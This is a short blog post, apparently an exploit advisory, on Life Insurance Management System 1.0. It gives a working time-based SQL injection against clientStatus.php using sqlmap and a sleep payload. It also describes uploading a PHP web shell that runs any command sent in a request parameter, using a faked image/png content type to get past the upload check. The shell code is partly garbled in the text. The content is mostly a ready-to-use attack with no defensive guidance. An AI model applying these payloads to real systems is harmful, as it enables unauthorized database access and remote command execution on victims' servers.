Life Insurance Management System 1.0 SQL Injection/Shell Upload - Fun Phishing

Life Insurance Management System 1.0 SQL Injection/Shell Upload

January 19, 2021 pm

115 字 2 分钟

Life Insurance Management System 1.0 SQL Injection/Shell Upload

SQL Injection

Login in the application

Go to clientStatus.php?client_id=

sqlmap -u “http://192.168.0.108:8080/lims/clientStatus.php?client_id=1511986129'%20and%20sleep(20)%20and%20'1'='1
http://192.168.0.108:8080/lims/clientStatus.php?client_id=1511986129%27%20and%20sleep(20)%20and%20%271%27=%271“

Shell Upload

Login in the application

Go to Clients and you can add new client o modify existent

Click examination botton and upload a test.php with content:

“

"; $cmd =
($_REQUEST['cmd']); system($cmd); echo "

"; die; }?>“

Click Upload and intercept with burpsuite

Change the content type to image/png

Go to the path

http://localhost:8080/lims/uploads/test.php?cmd=dir

Exploit

SQL Injection Shell Upload

Backdoor.Win32.Whgrx Remote Stack Buffer Overflow Previous

Backdoor.Win32.Latinus.b Remote Buffer Overflow Next

TOC